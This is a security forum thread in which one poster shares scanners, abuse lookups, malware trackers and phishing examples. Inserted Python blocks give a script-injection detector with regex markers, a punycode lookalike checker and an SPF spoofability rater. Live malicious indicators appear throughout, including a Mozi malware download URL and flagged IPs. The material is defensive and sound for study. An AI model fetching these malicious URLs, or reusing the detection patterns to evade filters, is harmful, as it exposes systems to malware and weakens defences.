Medium Severity
: CVE-2020-11022
Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
Medium Severity
: CVE-2020-11023
Content Security Policy
No Content Security Policy configured for this site. Create one now

SSL Tracking security:
Quote
This website is insecure.
66% of the trackers on this site could be protecting you from NSA snooping. Tell -aeiou.pt to fix it.

 All trackers
At least 3 third parties know you are on this webpage.

 -Google
 -Google
-ajuda.aeiou.pt -ajuda.aeiou.pt

Good thing site kicks up 100% content.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 02, 2021, 10:22:26 PM
Public scan report IPs (however now no longer online) could lead to abuse reports.

Let us start from one random example at urlscan.io ->
https://urlscan.io/result/720315e3-d0b9-4d51-8647-3c5f317dafa1/

and then we stumble at abuse mentioned here: https://www.abuseipdb.com/check/185.199.108.153
also re: https://www.shodan.io/host/185.199.108.153

before we land here at this abuse report: https://ip-46.com/185.199.108.153
Comodo is the one to confirm here: https://www.virustotal.com/gui/url/94073c941a6785806789528369b19c49bead1cc054443bf07273894ef7925ceb/detection

See Fastly abuse: https://www.virustotal.com/gui/ip-address/185.199.108.153/relations

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 03, 2021, 05:13:39 PM
Going through a long list of tor abusers, well, see the index here: http://www.kilitary.ru/tor.db/

Then check here: https://www.abuseipdb.com/check/104.244.73.43 &  here: https://ip-46.com/193.31.24.154

Experiences can be "mixed": https://community.torproject.org/relay/community-resources/good-bad-isps/
Also use this checker: https://www.getipintel.net/free-proxy-vpn-tor-ip-lookup/#web
and
https://www.ipqualityscore.com/tor-ip-address-check

Bad high risk IP address: https://www.ipqualityscore.com/free-ip-lookup-proxy-vpn-test/lookup/193.31.24.154

Interesting -> https://iplists.firehol.org/?ipset=stopforumspam_365d

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 05, 2021, 06:55:10 PM
Abuse and insecurity often will go hand in hand.

Banned as a web forum spammer: https://ip-46.com/185.32.221.247  (with 2 distinct reports and banned here as well),
Now see the many vulnerabilities at the base of this IP: Swiss ISP - Xelon AG: https://www.shodan.io/host/185.32.221.247
-> https://www.ip-tracker.org/locator/ip-lookup.php?ip=185.32.221.247

Executables detected coming from this IP - 2 flags: https://www.virustotal.com/gui/ip-address/185.32.221.247/relations

Lists: https://fspamlist.com/  &  https://github.com/kambrium/apache-referrer-spam-blacklist  &
random example: https://ip-46.com/27.68.13.2

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 06, 2021, 03:05:34 PM
Tor Project has started a consensus statuspage for tor users. Downtimes will now be published.

Nice to compare: http://128.31.0.13/tor/status-vote/current/consensus
to the Ukrainian resource: https://kilitary.ru/tor.db/128.31.0.13/1932848058.txt

polonus (volunteer 3rd party cold reconnaissance website security-analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on May 07, 2021, 02:42:54 PM
While this IP was reported to be a webforum spam address, it still has not entered here:
https://scamalytics.com/ip/203.192.236.2  score: 3

Similar story and a 5 score: https://scamalytics.com/ip/157.46.210.58
This tor-exit-node is missed altogether: https://scamalytics.com/ip/185.200.100.255

So we have to test online services first before we recommend using them.
Re: https://sitereport.netcraft.com/?url=https://scamalytics.com
But given the all green here: https://www.site24x7.com/tools/public/t/results-1609429926193.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 08, 2021, 01:00:16 PM
Resources next to URLHaus -> https://urlhaus.abuse.ch/
ThreatFox Indicators of Compromise -> https://threatfox.abuse.ch/
Most seen malware is Dridex
There is even a trend-tracker for it at: https://any.run/malware-trends/dridex
Quote
Dridex is a very evasive and technically complex banking Trojan. Despite being based on a relatively old malware code, it was substantially updated over the years and became capable of using very effective infiltration techniques that make this malware especially dangerous.

 Type        Trojan
 Origin       ex-USSR territory
 First seen  1 January, 2014
  See example: https://ip-46.com/178.175.47.124#ip-feeds
See: https://www.virustotal.com/gui/file/2e4506802aedea2e6d53910dfb296323be6620ac08c4b799a879eace5923a7b6/relations  and Malicious URL - -http://178.175.84.253:34009/Mozi.a (and relations when you click it in VT) - avast detects this as Other:Malware-gen [Trj]

Number of malicious IPs given per AS: https://abuse.ch/blog/how-to-takedown-100000-malware-sites/
which we do not find here: https://ipinfo.io/AS60144 nor here: https://dnslytics.com/bgp/as60144

Additionally Malware URLs per AS: https://www.malwareurl.com/ns_listing.php?as=as13335  (nr. 9 in the 10 worst list).
And another resource on bots: http://botscout.com/countrycheck.htm?cc=eu
And other resources: https://tria.ge/210104-ypkaw5zann

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 08, 2021, 02:57:29 PM
Two other resources that will produce interesting results when combined...

Started here: https://scanurl.net/u/about-me-tracy-vox
and checked also here:

Then analyzed here: https://www.convertcsv.com/url-extractor.htm
producing
Quote
-https://about.me/s3/h/z/proxima_nova_reg-latin-a.30bcf879.svg#proxima_novaregular)
-https://about.me/s3/h/z/proximanova-bold-webfont.e99b8cdf.svg#proxima_novabold)
-https://about.me/s3/h/z/proximanova-boldit-webfont.d4eed10d.svg#proxima_novabold_italic)
-https://about.me/s3/h/z/proximanova-light-webfont.083d8df5.svg#proxima_novalight)
-https://about.me/s3/h/z/proximanova-regular-webfont.f142eece.svg#proxima_novaregular)
-https://about.me/s3/h/z/proximanova-regularit-webfont.767b818c.svg#proxima_novaitalic)
-https://about.me/tracy.vox
-https://api.about.me
-https://assets.about.me/background/users/t/r/a/tracy.vox_1620422403_437.jpg
-https://dw.about.me
-https://images.about.me
-https://jwqebx.shewantyou.net/c/da57dc555e50572d?s1=99832&amp;s2=1186447&amp;s3=Inst&amp;click_id=Inst&amp;j1=1&amp;j3=1
-https://use.typekit.net/geu7rrs.css
-https://www.google-analytics.com/analytics.js
-https://www.google.com/recaptcha/api.js

Results true: https://transparencyreport.google.com/safe-browsing/search?url=lmwll.shewantyou.net
While DrWeb flags IP: https://www.virustotal.com/gui/ip-address/54.205.191.137/detection
Amazonaws abuse: see Google results, a.o. https://www.google.com/url?client=internal-element-cse&cx=003414466004237966221:dgg7iftvryo&q=https://www.abuseipdb.com/check/54.205.191.137&sa=U&ved=2ahUKEwjimY-AlLrwAhUgwQIHHUOyC5EQFjAAegQIAxAB&usg=AOvVaw2nP5AHavAX-cyqKpwj489R

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 11, 2021, 06:08:16 PM
Combining resources on a malicious IP.
Re: https://ip-46.com/45.127.98.237
Re: https://viz.greynoise.io/ip/45.127.98.237
Re: https://beta.shodan.io/host/45.127.98.237
Re: https://secure.dshield.org/ipdetails.html?ip=45.127.98.237&1  (data for research purposes only)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 13, 2021, 01:17:34 PM
Website with recent data leaks. Related to a hypernode glitch?
Re: https://www.magereport.com/scan/?s=https://www.serverkast.com/

<iframe src="hxtps://www.googletagmanager.com/ns.html?id=GTM-MQCQSDP" height="0" width="0" style="display:none;visibility:hidden"></iframe>
Just a note, social media buttons often show up here. They are probably OK.

Link check: https://urlextractor.net/?target_url=https%3A%2F%2Fwww.serverkast.com%2F&href=1&link_type=all&image=1&meta=1&extract=Extract+Links

See: https://webhint.io/scanner/208f611c-d4ac-4a9e-87d3-4cace8f39ab5  (48 hints)

See: https://awesometechstack.com/analysis/website/serverkast.com/?protocol=https%3A

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 19, 2021, 12:26:02 PM
Checking on malicious chrome extensions with crxcavator.

Example for The Microsoft Authenticator (not by MS): https://crxcavator.io/source/mabdjppmcjpjploliggpbonahnjjlgkf/1.1.0?file=manifest.json&platform=Chrome

Info credits go here: https://www.theregister.com/2021/05/19/chrome_extension_microsoft_authenticator_fake/?td=keepreading-btm

Example: https://crxcavator.io/report/ljafjhbjenhgcgnikniijchkngljgjda?platform=Chrome&new_scan=true

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 19, 2021, 05:37:26 PM
Google will limit user agent Chrome info not earlier than next year.

See how unique you and your browser are: https://amiunique.org/fp

"Yes! You are unique among the 3524670 fingerprints in our entire dataset".

Read: https://whoer.net/blog/fingerprints-unique-browser-traces-part-2/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 23, 2021, 10:57:00 PM
Dear online Interweb's end-users,

Your privacy may be at stake. Nice resources: https://restoreprivacy.com/

On search engines, where your privacy is often the price you pay for your search results.

Some search engines may have big red flags, when owned by a US company.

The U.S. has extensive surveillance programs, which are carried out by various branches of the government
with a long history of facilitating bulk data collection (questions raised for private search engines hosted on Amazon,
and also in the Cloud). So read here: https://restoreprivacy.com/private-search-engine/ 

(info credits: Sven Taylor 2020).

With the new situation at hand now through 2021 and the pandemic,
we'll have to see how privacy restore can still be enabled, and to what an extent.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 26, 2021, 10:05:24 PM
Check on changing status when opening a particular website inside the browser and security of a connection.
-https://ip-46.com/77.247.110.24
200
200
  from cache
and
-https://ip-46.com/77.247.110.24
-1
-1
 
 14111 ms
0
Backlinks
LRT Power0
PAGE
LRT Trust0
0
 
0

No PFS - https://sitereport.netcraft.com/?url=https://ip-46.com

Communicating file detected: https://www.virustotal.com/gui/ip-address/198.50.154.167/relations

F-test scores: https://observatory.mozilla.org/analyze/ip-46.com

Free check sites at: (example) https://www.ssltrust.com.au/ssl-tools/website-security-check?domain=forum.avast.com (all green).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 29, 2021, 12:46:18 PM
Checking the vulnerability and security status of an open source project's code?

Check here: https://metrics.openssf.org/grafana/d/default/metric-dashboard?orgId=1&var-PackageURL=pkg:github%2Fretirejs%2Fretire.js   (random example for retire.js)

Can best be done by others than those that wrote the code,
as developers are known to be blind to their own coding-errors.

The main issue can be whether the code is being maintained (no abandoned code): https://isitmaintained.com/project/retirejs/retire.js

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 31, 2021, 12:55:54 PM
Indicators of Compromise, read: https://www.fortinet.com/resources/cyberglossary/indicators-of-compromise
Example of njRAT malware: -https://any.run/malware-trends/njrat
Particular incident: -https://app.any.run/tasks/1bb9bb5f-fba5-4674-80dd-07d7788a771b/
Could not be scanned here: https://urlscan.io/result/fc46bfb6-4b11-4b7a-800c-b795c9d3b94a/
However see: https://urlscan.io/result/79d5e9fe-4635-4e4d-8592-790e479a8ee4/
IoC: https://urlscan.io/result/79d5e9fe-4635-4e4d-8592-790e479a8ee4/#indicators
Server error encountered for: https://urlscan.io/domain/knrpc.olark.com

Another resource:
-https://bazaar.abuse.ch/sample/0685a699fb13d6bc99b6aee35381acf77b00155d56e7448a300aa308fd07598c/

Earlier abuse was not detected on IP here: 3.141.210.37  Amazonaws abuse: https://www.shodan.io/host/3.141.210.37
See: https://security-tracker.debian.org/tracker/CVE-2018-20685  for 7.4.p1 Debian OpenSSH vuln.
User Enumeration is not being treated as a vulnerability, and provision recovery requests.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 01, 2021, 11:10:42 PM
Recently blocked in the latest version of Firefox.
Test for it here: https://webkay.robinlinus.com/
Disable this https://robinlinus.github.io/autofill-phishing/

Or test here:
https://www.hellotech.com/blog/what-your-web-browser-knows-about-you
See what I did? https://i.gyazo.com/172e2bba116d697698b81313116d49b3.png

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 05, 2021, 06:19:09 PM
Interesting security project for code developers by Google.
Example
Re: https://deps.dev./npm/node.js  (see why for instance owner 0.0.0. was deleted).
Re: https://deps.dev/npm/bootstrap

Also view information about checks (for instance through fuzzing) and how to fix failures.

Visualization: https://deps.dev/cargo/tui  Example: https://deps.dev/cargo/bootstrap/1.0.2

polonus (volunteer 3rd party cold reconnaissance website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 05, 2021, 10:00:41 PM
Other likewise projects: https://owasp.org/www-project-dependency-check/

Snyk, NSP & Retire.JS: https://developers.redhat.com/blog/2017/04/12/using-snyk-nsp-and-retire-js-to-identify-and-fix-vulnerable-dependencies-in-your-node-js-applications

Re: https://support.snyk.io/hc/en-us/articles/360010452717-Snyk-Vs-NPM-Audit -> https://snyk.io/vuln *
plenty of tools like: https://github.com/East5th/check-checker

A random SNYK online website scanner report, of a website with no known vulnerabilities as overall scan result:
https://webpagetest.org/result/210605_AiDc3S_d7752fa2dead94d56a2e264d24d0b4de/
Info credits go to Catchpoint Systems Inc. Dulles VA.
In JSON same report: https://webpagetest.org/jsonResult.php?test=210605_AiDc3S_d7752fa2dead94d56a2e264d24d0b4de&pretty=1

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 06, 2021, 03:01:36 PM
Detect a rogue DHCP server with the Microsoft Rogue Check Tool.
MS does not have the download link anymore.
But it can still be found here: https://www.tachytelic.net/2019/05/detect-rogue-dhcp-server/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 09, 2021, 07:01:48 PM
Check your browser fingerprint: https://fingerprints.bablosoft.com/canvas

Mine slightly adjusted by Jitter extension.

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 17, 2021, 12:11:18 AM
Some cache clearing/cache evading code could be interpreted as attack code when used in URIs.

What code:
Quote
ajax%28%7B+url%3A+window.location.href%2C+headers%3A+%7B+"Pragma"+%3A+"no-cache"+%2C+"Expires"+%3A+-1%2C+"Cache-Control"+%3A+"no-cache"+%7D+%7D%29.done%28function+%28%29+%7B+window.location.reload%28true%29

This triggers an attack code alarm detected by NoScript and a proposition to block the request,
or, when allowed, could bring you back to a welcome page on PHP-driven websites, when used as part of a URI request.

The code is from stackoverflow (info credits go there), so presumably given with good intentions to solve a problem,
but can deliver a ban when used inside a URI. So be aware with your cut and pasting inside your browser of choice.
Always (re-)think before you leap,

polonus
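To show what makes a filter like NoScript's raise an alarm on such a request, here is an added example (not code from the post, and not NoScript's own rule set): it percent-decodes each query parameter the way an injection filter does, repeatedly so that double encoding cannot hide anything, and reports the script-looking tokens it finds. The request URIs are constructed; the first one carries the snippet quoted above as its `q` parameter, the others are harmless requests that merely mention caching.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Markers of executable script where only data should travel. Illustrative;
# this is not NoScript's actual rule set.
SCRIPT_MARKERS = [
    r"\bwindow\.location\b",
    r"\bdocument\.(?:cookie|write|location)\b",
    r"\bfunction\s*\(",
    r"\beval\s*\(",
    r"<\s*script\b",
    r"\bjavascript\s*:",
    r"\bon[a-z]+\s*=",
]
MARKER_RE = re.compile("|".join(SCRIPT_MARKERS), re.IGNORECASE)


def full_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the text stops changing, so %2528-style double
    encoding cannot hide a payload from the check."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def script_markers_in(value: str) -> list[str]:
    """Distinct script-like tokens present in an already decoded value."""
    return sorted({m.group(0).lower() for m in MARKER_RE.finditer(value)})


def flag_request(uri: str) -> dict:
    """Inspect the path and every query parameter of a request URI."""
    parts = urlsplit(uri)
    hits = {}
    path_hits = script_markers_in(full_decode(parts.path))
    if path_hits:
        hits["<path>"] = path_hits
    # keep_blank_values so a parameter without '=' is still looked at
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        found = script_markers_in(full_decode(value))
        if found:
            hits[name] = found
    return {"uri": uri, "suspicious": bool(hits), "markers": hits}


# Constructed sample request URIs, as they would appear in an access log.
# The first carries the cache-clearing snippet quoted in the post above.
SAMPLE_URIS = [
    '/index.php?page=home&q=ajax%28%7B+url%3A+window.location.href%2C+headers%3A+%7B+"Pragma"+%3A+"no-cache"+%2C+"Expires"+%3A+-1%2C+"Cache-Control"+%3A+"no-cache"+%7D+%7D%29.done%28function+%28%29+%7B+window.location.reload%28true%29',
    "/index.php?page=home&nocache=1",
    "/search.php?q=Cache-Control+no-cache+header+explained",
]


def triage(uris=SAMPLE_URIS) -> list[dict]:
    """Run the check over a batch and return only the flagged requests."""
    return [r for r in (flag_request(u) for u in uris) if r["suspicious"]]


if __name__ == "__main__":
    for result in triage():
        print(result["uri"][:60], "->", result["markers"])
```

Only the first URI is flagged, on `window.location` and `function (`; the two benign requests pass even though one of them literally contains "no-cache", which is the distinction a server-side WAF rule should make as well.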
Title: Re: Tests and other Media topics
Post by: polonus on June 20, 2021, 10:16:12 PM
Keep an eye on the availability of the big (cloud) networks.
Re: https://www.dnsperf.com/  And mind you, when you see less, it's better.
See random example: https://www.dnsperf.com/dns-provider/onapp

What would we see in case of a big cyber-infrastructure meltdown?
In case of trouble here: https://www.dnsperf.com/dns-provider/cloudflare (or amazon)?
Also see: https://dnsmap.io/#A/restoreprivacy.com

WEF's spokesmen have warned us it could come to this.

Security never should be a last resort issue. ;)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 14, 2021, 05:54:09 PM
Block ads, want to add some blocklists to your adblocker of choice:
https://firebog.net/

Tool to keep all in sync: https://github.com/jacklul/pihole-updatelists

DNS Analytics: https://blog.cloudflare.com/dns-analytics/

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 19, 2021, 01:03:54 AM
Test your Magento CMS site through MageReport dot com. Here we will see outdated CMS being flagged.

Re: https://urlscan.io/result/4bcc9cbb-8242-4929-bc0c-5e7becd532b6/
and https://www.magereport.com/scan/?s=http://martfurynew.mydevportals.com/

Do not venture out there as the connection is not secure.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 22, 2021, 11:47:04 AM
Pegasus Spyware: Amnesty International has come out with a tool, to check your smartphone for this spyware:

https://github.com/mvt-project/mvt

Link to a list of IOCs to use (Indicators of Compromise) here: https://www.security.nl/posting/712743#posting713140

It needs some niftiness handling a command line, but it is a way for people to establish whether they have been targeted.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 26, 2021, 02:47:02 PM
Check for fraudulent IP: https://scamalytics.com/ip

Also: https://www.abuseipdb.com/

IP v4 v6 Intelligence: https://ip-46.com/

Don't forget about Avast Online Security in your browser, also report there.

Also: https://phishcheck.me/6224/details (random example) ; https://www.scam-detector.com/article/list-of-scamming-websites/ ;
https://www.azsecure-data.org/phishing-websites.html  &  https://www.consumerfraudreporting.org/current_top_10_scam_list.php

Re: https://www.virustotal.com/gui/domain/mercetruck.com.br/detection (latest detection by Phisbank, 4 vendors detect).
Unprotected Magento website: https://www.magereport.com/scan/?s=http://www.mercetruck.com.br/
Insecure connection to -http://162.144.139.197/cgi-sys/defaultwebpage.cgi

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 28, 2021, 06:57:40 PM
Checking URLhaus links with Link Extractor and at VT.
https://urlhaus.abuse.ch/browse.php?search=https%3A%2F%2Fdocs.zohopublic.com%2F  (Trickbot, rob114, rob111, -dll malware)
Example -https://urlextractor.net/?target_url=https%3A%2F%2Fdocs.zohopublic.com%2F&href=1&link_type=all&image=1&meta=1&extract=Extract+Links
with 9 links (minus - when you want to venture to visit urlextractor yourself).

1 to detect: https://www.virustotal.com/gui/url/336cc2ea335242788e4c4a0c814c043b81001e82216b7cce9263045169b3ee2f/detection

For that link at URLhaus behind a London proxy I get:
Quote
Banned

Guru Mediation:
Details: cache-ams21032-AMS 16274908XX YYY5846374

Site issue: https://sitecheck.sucuri.net/results/https/accounts.zoho.com/signin?q=servicename%3DZohoPC%26serviceurl%3D%252Findex.do   - 204.141.42.100 abuse

Detected android files (10), see for IP: https://www.virustotal.com/gui/ip-address/204.141.42.97/relations

polonus (volunteer 3rd party website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 29, 2021, 10:27:30 PM
Checking with extensions in Chrome for security issues on websites.

In general: Avast Online Security - Bitdefender's Traffic Light - Dr Web Link Checker (also out as an online service).
Netcraft Extension, Recx Security Analyzer, retire.js (no longer available as an online service), Quick Source Viewer, VT4 browser extension, Zenmate Web Firewall (no longer available), just recently new: punkspider-browser-extension (also coming soon as an online service), Shodan, Tracker SSL.

Punkspider checks for SQLI, TRAV, XPATH and XSS vulnerabilities.

Also use this scan: (random example)
https://snyk.io/test/website-scanner/?test=210729_BiDcDR_4cd520c32268413a93d0db4d09dc1f4a

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 02, 2021, 05:54:35 PM
Criminals used punycode domain to imitate Brave.com.
The real criminal issue is that such DNS registrations are for sale.

Test in your browser, whether you get an alert: https://www.xn--80ak6aa92e.com/
Google Chrome will alert you, and you can choose to mind that warning (the best option) or ignore.

Here a punycode converter: https://www.punycoder.com/

When using the Firefox browser:
1. Open about:config
2. Set the value "network.IDN_show_punycode" to "true"
Fixed.


pol
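What a browser decides before showing you the Unicode form or the raw xn-- form, as an added example rather than anything from the post: decode the punycode labels, see which scripts each label uses, and compare a confusable "skeleton" with a short list of domains worth protecting. The skeleton map is a hand-built subset of the Unicode TR39 confusables table, `apple.com` in the protected list is my choice (brave.com is from the post), and the test domain is the one linked above.

```python
import unicodedata

# Hand-built subset of the Unicode TR39 confusables table: Cyrillic letters
# that render like Latin ones. Browsers use the full table.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u04cf": "l",
    "\u0456": "i", "\u0458": "j", "\u0455": "s", "\u04bb": "h",
}

# Domains a phishing kit would want to imitate (assumed list for the example).
PROTECTED = ("apple.com", "brave.com")


def decode_idn(domain: str) -> str:
    """Turn each xn-- label back into Unicode; plain labels are kept as-is."""
    labels = []
    for label in domain.lower().split("."):
        if label.startswith("xn--"):
            label = label[4:].encode("ascii").decode("punycode")
        labels.append(label)
    return ".".join(labels)


def scripts_of(label: str) -> set[str]:
    """Script names used by the letters of a label (digits and hyphens ignored).
    unicodedata has no script property, so the first word of the character
    name ("LATIN", "CYRILLIC", "GREEK") serves as a workable proxy."""
    found = set()
    for ch in label:
        if ch.isalpha():
            found.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return found


def skeleton(text: str) -> str:
    """Replace confusable characters by the Latin letter they resemble."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in text)


def assess(domain: str, protected=PROTECTED) -> dict:
    """Decide how a cautious browser should display this host name."""
    unicode_form = decode_idn(domain)
    per_label = {lbl: scripts_of(lbl) for lbl in unicode_form.split(".")}
    mixed = any(len(s) > 1 for s in per_label.values())
    non_latin = any(s - {"LATIN"} for s in per_label.values())
    skel = skeleton(unicode_form)
    lookalike = skel if (skel in protected and skel != unicode_form) else None
    return {
        "input": domain,
        "unicode": unicode_form,
        "scripts": per_label,
        "mixed_script": mixed,
        "non_latin": non_latin,
        "lookalike_of": lookalike,
        # network.IDN_show_punycode=true shows `domain` as-is for every IDN;
        # this policy only does so when something looks wrong.
        "display": domain if (mixed or lookalike) else unicode_form,
    }


if __name__ == "__main__":
    for host in ("xn--80ak6aa92e.com", "apple.com", "xn--mnchen-3ya.de"):
        r = assess(host)
        print(host, "->", r["display"], "| lookalike of:", r["lookalike_of"])
```

The linked domain decodes to five Cyrillic letters whose skeleton is exactly `apple.com`, so the policy keeps the punycode on screen; a legitimate IDN such as `xn--mnchen-3ya.de` (München) has no lookalike and is shown in Unicode.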
Title: Re: Tests and other Media topics
Post by: polonus on August 05, 2021, 10:10:40 PM
Website links galore: https://urlextractor.net/?target_url=

Enjoy, my friends, enjoy,

pol
Title: Re: Tests and other Media topics
Post by: polonus on August 06, 2021, 03:57:27 PM
Be ahead of scams. Check for scam websites.
scamanalyze.com
scamvoid.net
scamdoc.com
scamdetector.com
scamquery.com
ripandscam.com
scambusters.org/scamcheck.html
scamvoid.net

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2021, 05:02:47 PM
Comparing info on a Tor exit node IP and abuse on a VPN/TOR Proxy.

9 distinct reporters reported here: https://ip-46.com/45.153.160.140
GreyNoise has it and flags it: https://www.greynoise.io/viz/ip/45.153.160.140
Also found in this database: https://www.abuseipdb.com/check/45.153.160.140
Unsafe connection -http://45.153.160.140/  &  https://www.ip-lookup.org/location/45.153.160.140
9 security vendors to flag IP: https://www.virustotal.com/gui/url/74a30a455eeaac138a4985a36cc2eff76959decff61994b62ad10cbabb212643/detection
See outgoing links: https://www.virustotal.com/gui/url/74a30a455eeaac138a4985a36cc2eff76959decff61994b62ad10cbabb212643/links

Interesting info on Peter Kleissner's intelligence search engine (indexable by every bot for that matter)
https://intelx.io/?s=http%3A%2F%2Fvoices.washingtonpost.com%2Fsecurityfix%2F2008%2F08%2Fweb_fraud_20_tools.html
further example: https://intelx.io/?did=29f4761d-26e6-4f36-a21a-bc526a38933f  -> selectors.
Also interesting: https://notgoogle.com/demo/?search=apache

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 22, 2021, 08:43:55 PM
Check whether a domain is spoofable for instance through ~all item
https://www.smartfense.com/en-us/tools/spoofcheck/
Also test at https://dnstwister.report

polonus
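The ~all item mentioned above is the "all" qualifier at the end of an SPF record. As an added example (my own code, not the spoofcheck tool's), this parses the two TXT records such a service looks at, SPF and DMARC, and rates how easily mail can be forged for the domain: a ~all softfail with no enforced DMARC policy is exactly the spoofable case. The records below are constructed for a fictitious example.com.

```python
# Meaning of the qualifier in front of "all", as receivers interpret it.
ALL_VERDICTS = {"-": "fail", "~": "softfail", "?": "neutral", "+": "pass"}
# Mechanisms and modifiers that cost a DNS lookup; RFC 7208 allows at most 10.
LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists", "redirect"}


def parse_spf(record: str) -> dict:
    """Split an SPF TXT record into its 'all' qualifier, mechanisms and lookup count."""
    terms = record.strip().split()
    if not terms or terms[0].lower() != "v=spf1":
        return {"valid": False}
    all_qual, mechanisms, lookups = None, [], 0
    for term in terms[1:]:
        qual = term[0] if term[0] in "+-~?" else "+"
        body = term.lstrip("+-~?")
        if body.lower() == "all":
            all_qual = qual
            continue
        mechanisms.append(term)
        name = body.split(":")[0].split("=")[0].split("/")[0].lower()
        if name in LOOKUP_TERMS:
            lookups += 1
    return {"valid": True, "all": all_qual, "mechanisms": mechanisms, "lookups": lookups}


def parse_dmarc(record: str) -> dict:
    """Extract the policy from a DMARC TXT record (v=DMARC1; p=...; ...)."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1":
        return {"valid": False}
    return {"valid": True, "policy": tags.get("p", "none").lower(), "tags": tags}


def spoofability(spf_record, dmarc_record) -> dict:
    """Rate how easily mail can be forged for a domain given its two records."""
    spf = parse_spf(spf_record) if spf_record else {"valid": False}
    dmarc = parse_dmarc(dmarc_record) if dmarc_record else {"valid": False}
    reasons = []
    if not spf["valid"]:
        reasons.append("no SPF record")
    else:
        if spf["all"] is None:
            reasons.append("SPF has no 'all' term (implicitly neutral)")
        elif spf["all"] != "-":
            reasons.append(f"SPF ends in {spf['all']}all ({ALL_VERDICTS[spf['all']]})")
        if spf["lookups"] > 10:
            reasons.append("SPF needs more than 10 DNS lookups (permerror)")
    if not dmarc["valid"]:
        reasons.append("no DMARC record")
    elif dmarc["policy"] == "none":
        reasons.append("DMARC p=none only monitors")

    hard_spf = spf["valid"] and spf["all"] == "-" and spf["lookups"] <= 10
    enforced = dmarc["valid"] and dmarc["policy"] in ("quarantine", "reject")
    if enforced and spf["valid"] and spf["all"] != "+":
        # DMARC enforcement turns a softfail/neutral SPF result into a rejection
        rating = "protected"
    elif hard_spf:
        rating = "partially protected"  # SPF -all alone; each receiver decides
    else:
        rating = "spoofable"
    return {"rating": rating, "reasons": reasons, "spf": spf, "dmarc": dmarc}


# Constructed records; the ~all softfail without DMARC is the case the
# spoof-check tool above singles out.
SAMPLES = {
    "softfail_only": ("v=spf1 include:_spf.example.net ~all", None),
    "hardfail_only": ("v=spf1 ip4:192.0.2.0/24 mx -all", None),
    "softfail_monitor": ("v=spf1 include:_spf.example.net ~all",
                         "v=DMARC1; p=none; rua=mailto:dmarc@example.com"),
    "softfail_enforced": ("v=spf1 include:_spf.example.net ~all",
                          "v=DMARC1; p=reject; rua=mailto:dmarc@example.com"),
    "wide_open": ("v=spf1 +all", "v=DMARC1; p=reject"),
}


def rate_samples() -> dict:
    return {name: spoofability(*recs)["rating"] for name, recs in SAMPLES.items()}


if __name__ == "__main__":
    for name, rating in rate_samples().items():
        print(f"{name:18} {rating}")
```

Note the last sample: a DMARC reject policy does nothing for a domain whose SPF says +all, because a forged message then gets an aligned SPF pass.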
Title: Re: Tests and other Media topics
Post by: polonus on August 24, 2021, 08:29:07 PM
Check regular expressions here https://www.regextester.com/93652
Another test site: https://regex101.com/r/rV7zK8/1
This for the technical IT staff and pen-testers, error-hunters etc.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 05, 2021, 03:19:42 PM
Browser security test: https://browseraudit.com/test?categories=
Only one critical in the Brave browser on Android.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 17, 2021, 03:26:45 PM
I gave you all here various examples of quick and dirty CMS security scans.
Read: https://hackertarget.com/100k-top-wordpress-powered-sites/
For Magento use: https://www.magereport.com/  from Dutch developer GWillem and his tool Hypernode.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 17, 2021, 06:01:27 PM
A scamsite scanner: https://www.scamdoc.com/fr/view/628399
and for the english version: https://www.scamdoc.com/view/628399

Another scam checker: www.scam-detector.com * & www.urlvoid.com  and www.scamquery.com
and  scamanalyze.com

*
Quote
403 ERROR
The request could not be satisfied.
Request blocked. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.
Generated by cloudfront (CloudFront)
